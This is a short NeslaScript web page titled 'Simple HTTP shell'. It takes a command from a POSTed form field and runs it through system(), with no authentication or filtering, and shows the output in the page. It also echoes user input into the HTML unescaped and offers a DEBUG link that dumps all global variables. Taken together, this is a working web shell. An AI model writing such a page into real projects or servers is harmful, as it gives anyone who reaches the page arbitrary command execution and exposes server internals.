#!/usr/bin/nesla
if (typeof(_SERVER)!='table') {
global _SERVER = { REQUEST_METHOD="GET", PATH_INFO="/nesla/blah" };
} // this is a debug block
if (string.cmp(_SERVER['REQUEST_METHOD'], "POST")==0) {
var path=_POST['PATH'];
var command=_POST['COMMAND'];
} else {
var path=_filepath;
var command="ps auxw";
}
print(
"<HTML>\n",
"<TITLE>Simple HTTP shell</TITLE>\n",
"<HEAD>\n",
"<STYLE TYPE=text/css>\n",
"A { color: #0000FF; text-decoration: none; }\n",
"A:HOVER { background-color: #E0E0FF; }\n",
"</STYLE>\n",
"</HEAD>\n",
"<BODY>\n",
"<CENTER>\n",
"<FORM ACTION='", _SERVER['PATH_INFO'], "' METHOD='POST' NAME='shell'>\n",
"<TABLE BORDER=0 CELLPADDING=0 CELLSPACING=0 BGCOLOR='#E0E0E0'>\n",
"<TR><TD>Path </TD><TD><INPUT SIZE=50 NAME='path' VALUE='", path, "'></TD></TR>\n",
"<TR><TD>Command</TD><TD><INPUT SIZE=50 NAME='command' VALUE='", command, "'></TD></TR>\n",
"<TR><TD ALIGN=CENTER COLSPAN=2><input type='submit' value='go' name='submit'></TD></TR>\n",
"</TABLE>\n",
"</FORM>\n",
"</CENTER>\n"
);
print("<FORM NAME=\"psout\"><TEXTAREA WRAP=PHYSICAL NAME=details ROWS=25 COLS=80 style='width:100%'>\n");
system(command);
print("</TEXTAREA></FORM>");
print(
"<SCRIPT LANGUAGE=\"JavaScript\" TYPE=\"text/javascript\">\n",
"<!--\n",
"document.shell.command.focus();\n",
"// -->\n",
"</SCRIPT>\n"
);
print(
"<SCRIPT LANGUAGE=\"JavaScript\" TYPE=\"text/javascript\">\n<!--\n",
"function showdebug() {\n",
" if (document.getElementById('debug').style.display=='none') {\n",
" document.getElementById('debug').style.display='block';\n",
" } else {\n",
" document.getElementById('debug').style.display='none';\n",
" }\n",
"}\n",
"// -->\n</SCRIPT>\n"
);
print("<A HREF=javascript:showdebug()>DEBUG</A>\n");
print("</CENTER>\n");
print("<DIV ID=debug STYLE='display:none'><PRE><FONT SIZE=2>\n");
printvar(_GLOBALS);
print("</FONT></PRE></DIV>\n");
print("</BODY>\n</HTML>\n");